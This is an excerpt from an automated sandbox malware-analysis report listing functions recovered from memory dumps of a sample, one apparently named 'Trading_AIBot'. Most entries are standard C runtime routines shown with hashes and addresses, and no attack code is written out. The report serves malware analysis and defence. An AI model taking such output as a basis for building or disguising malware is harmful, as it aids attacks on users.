                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3809854901-0
                                                                                                                                • Opcode ID: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
                                                                                                                                • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                • Opcode Fuzzy Hash: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
                                                                                                                                • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                APIs
                                                                                                                                • _malloc.LIBCMT ref: 004057DE
                                                                                                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                • _malloc.LIBCMT ref: 00405842
                                                                                                                                • _malloc.LIBCMT ref: 00405906
                                                                                                                                • _malloc.LIBCMT ref: 00405930
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                • String ID: 1.2.3
                                                                                                                                • API String ID: 680241177-2310465506
                                                                                                                                • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3886058894-0
                                                                                                                                • Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                                                                                                • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                • Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                                                                                                • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                APIs
                                                                                                                                • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                • String ID: 'B
                                                                                                                                • API String ID: 2805327698-2787509829
                                                                                                                                • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 00414744
                                                                                                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                • __getptd.LIBCMT ref: 0041475B
                                                                                                                                • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                • __lock.LIBCMT ref: 00414779
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                • String ID: @.B
                                                                                                                                • API String ID: 3521780317-470711618
                                                                                                                                • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                • __lock.LIBCMT ref: 00414008
                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                • InterlockedIncrement.KERNEL32(02131670), ref: 00414050
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __calloc_crt
                                                                                                                                • String ID: P$B$`$B
                                                                                                                                • API String ID: 3494438863-235554963
                                                                                                                                • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                                                                                                • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                                • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                APIs
                                                                                                                                • ___addlocaleref.LIBCMT ref: 0041470C
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                  • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                • ___removelocaleref.LIBCMT ref: 00414717
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                  • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                • ___freetlocinfo.LIBCMT ref: 0041472B
                                                                                                                                  • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                                                                                                  • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                                                                                                  • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                • String ID: @.B
                                                                                                                                • API String ID: 467427115-470711618
                                                                                                                                • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
                                                                                                                                • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
                                                                                                                                APIs
                                                                                                                                • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                • __locking.LIBCMT ref: 0040C791
                                                                                                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2395185920-0
                                                                                                                                • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _fseek_malloc_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 208892515-0
                                                                                                                                • Opcode ID: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
                                                                                                                                • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                • Opcode Fuzzy Hash: 689e5a2a8d0df6628a55ca55f65915ee6a0b33bdec45a2b9390eeacb6c5b01b1
                                                                                                                                • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                APIs
                                                                                                                                • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                • __locking.LIBCMT ref: 0040BB95
                                                                                                                                • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3240763771-0
                                                                                                                                • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                APIs
                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 89bcb84aa74e238b0102dab3b654f2e13fa6bed084be673585974cce40d68a50
                                                                                                                                • Instruction ID: ae611e720dbe19827ae902617aa7ec37b7230737bc44e3b1c01e03fd4bf46a20
                                                                                                                                • Opcode Fuzzy Hash: 89bcb84aa74e238b0102dab3b654f2e13fa6bed084be673585974cce40d68a50
                                                                                                                                • Instruction Fuzzy Hash: 19610370D00219CFCB14DFA5D994AADBBB6FF89304F609169D809BB264DB346D8ACF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2621325924.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_1760000_Trading_AIBot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e9f6a719dffa833122a84e71c277b17cc66941d5225fec19ba67f13b6996e913
                                                                                                                                • Instruction ID: 3153fa2b6aa5f5e3c9d288ff796114e2b4145b11cca280610ffbc06ade5510a3
                                                                                                                                • Opcode Fuzzy Hash: e9f6a719dffa833122a84e71c277b17cc66941d5225fec19ba67f13b6996e913
